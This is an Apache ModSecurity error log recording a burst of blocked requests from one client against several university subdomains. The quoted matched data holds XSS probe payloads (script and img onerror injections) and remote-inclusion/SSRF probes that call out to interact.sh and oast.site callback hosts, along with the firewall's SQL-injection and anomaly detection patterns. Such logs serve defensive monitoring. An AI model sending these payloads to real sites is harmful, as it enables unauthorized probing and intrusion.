[Tue Aug 29 11:52:02.713169 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:contactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:contactId: contactId'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php"] [unique_id "ZO15csCo-f0AAAlUlocAAAA0"]
[Tue Aug 29 11:52:02.719085 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wbm/login/"] [unique_id "ZO15csCo-f0AAAm7nFAAAAAE"]
[Tue Aug 29 11:52:02.722937 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wbm/login/"] [unique_id "ZO15csCo-f0AAAn0GZwAAAAa"]
[Tue Aug 29 11:52:02.760453 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wbm/login/"] [unique_id "ZO15csCo-f0AAAn40yUAAAAW"]
[Tue Aug 29 11:52:02.762431 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:search_term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:search_term: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15csCo-f0AAAn0GZ0AAAAa"]
[Tue Aug 29 11:52:02.784299 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wbm/login/"] [unique_id "ZO15csCo-f0AAAnd3DcAAAAI"]
[Tue Aug 29 11:52:02.799595 2023] [:error] [pid 2529] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:search_term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:search_term: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15csCo-f0AAAnh6PAAAAAS"]
[Tue Aug 29 11:52:02.800474 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:search_term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:search_term: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15csCo-f0AAAnIlm8AAAAV"]
[Tue Aug 29 11:52:02.803463 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:contactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:contactId: contactId'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php"] [unique_id "ZO15csCo-f0AAAjdQZYAAAAZ"]
[Tue Aug 29 11:52:02.804676 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:search_term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:search_term: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15csCo-f0AAAlIBi8AAAAn"]
[Tue Aug 29 11:52:02.805236 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:search_term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:search_term: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15csCo-f0AAAlUlokAAAA0"]
[Tue Aug 29 11:52:02.805724 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:contactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:contactId: contactId'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php"] [unique_id "ZO15csCo-f0AAAhoHTUAAAAl"]
[Tue Aug 29 11:52:02.826814 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:contactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:contactId: contactId'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php"] [unique_id "ZO15csCo-f0AAAlIBjAAAAAn"]
[Tue Aug 29 11:52:02.846994 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:contactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:contactId: contactId'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php"] [unique_id "ZO15csCo-f0AAAlIBjEAAAAn"]
[Tue Aug 29 11:52:02.847792 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wbm/login/"] [unique_id "ZO15csCo-f0AAAm7nFQAAAAE"]
[Tue Aug 29 11:52:02.876298 2023] [:error] [pid 2529] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search_title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search_title: \\x22><img src=x onerror=alert(domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/plugins/jobsearch/"] [unique_id "ZO15csCo-f0AAAnh6PIAAAAS"]
[Tue Aug 29 11:52:03.532108 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bundle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:bundle: ';alert(document.domain);var ok='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/passwordreset"] [unique_id "ZO15c8Co-f0AAAnkweEAAAAY"]
[Tue Aug 29 11:52:03.542380 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:search_term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:search_term: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15c8Co-f0AAAnd3DgAAAAI"]
[Tue Aug 29 11:52:03.607559 2023] [:error] [pid 2529] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:contactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:contactId: contactId'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php"] [unique_id "ZO15c8Co-f0AAAnh6PMAAAAS"]
[Tue Aug 29 11:52:03.719160 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search_title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search_title: \\x22><img src=x onerror=alert(domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/plugins/jobsearch/"] [unique_id "ZO15c8Co-f0AAAn959UAAAAD"]
[Tue Aug 29 11:52:04.766040 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ed. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');});}); found within ARGS:ed: foooooooooooooo');});});javascript:alert('document.domain');//g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/Dialog/FileDialog.aspx"] [unique_id "ZO15dMCo-f0AAAm@52YAAAAH"]
[Tue Aug 29 11:52:04.779960 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ed. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');});}); found within ARGS:ed: foooooooooooooo');});});javascript:alert('document.domain');//g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/Dialog/FileDialog.aspx"] [unique_id "ZO15dMCo-f0AAAni@@AAAAAU"]
[Tue Aug 29 11:52:04.857415 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ed. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');});}); found within ARGS:ed: foooooooooooooo');});});javascript:alert('document.domain');//g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/Dialog/FileDialog.aspx"] [unique_id "ZO15dMCo-f0AAAfWOKYAAAAL"]
[Tue Aug 29 11:52:04.875694 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ed. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');});}); found within ARGS:ed: foooooooooooooo');});});javascript:alert('document.domain');//g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/Dialog/FileDialog.aspx"] [unique_id "ZO15dMCo-f0AAAnn2AMAAAAe"]
[Tue Aug 29 11:52:04.886946 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0oef8hkb9tga9w.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0oef8hkb9tga9w.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp-json/oembed/1.0/proxy"] [unique_id "ZO15dMCo-f0AAAoAkt4AAAAC"]
[Tue Aug 29 11:52:04.902493 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ed. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');});}); found within ARGS:ed: foooooooooooooo');});});javascript:alert('document.domain');//g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Dialog/FileDialog.aspx"] [unique_id "ZO15dMCo-f0AAAnn2AQAAAAe"]
[Tue Aug 29 11:52:04.904945 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wbm/login/"] [unique_id "ZO15dMCo-f0AAAm@52cAAAAH"]
[Tue Aug 29 11:52:04.905493 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0ywrqbxex7dcwx.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0ywrqbxex7dcwx.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp-json/oembed/1.0/proxy"] [unique_id "ZO15dMCo-f0AAAn0GaIAAAAa"]
[Tue Aug 29 11:52:04.908317 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0d58knum9yz7ep.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0d58knum9yz7ep.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp-json/oembed/1.0/proxy"] [unique_id "ZO15dMCo-f0AAAni@@EAAAAU"]
[Tue Aug 29 11:52:04.927139 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0g9kntqrozy8a3.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0g9kntqrozy8a3.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-json/oembed/1.0/proxy"] [unique_id "ZO15dMCo-f0AAAnIlnUAAAAV"]
[Tue Aug 29 11:52:04.941563 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0n6c7j4ux43ggc.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0n6c7j4ux43ggc.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp-json/oembed/1.0/proxy"] [unique_id "ZO15dMCo-f0AAAfWOKgAAAAL"]
[Tue Aug 29 11:52:05.526369 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:secret. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:secret: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15dcCo-f0AAAfWOKkAAAAL"]
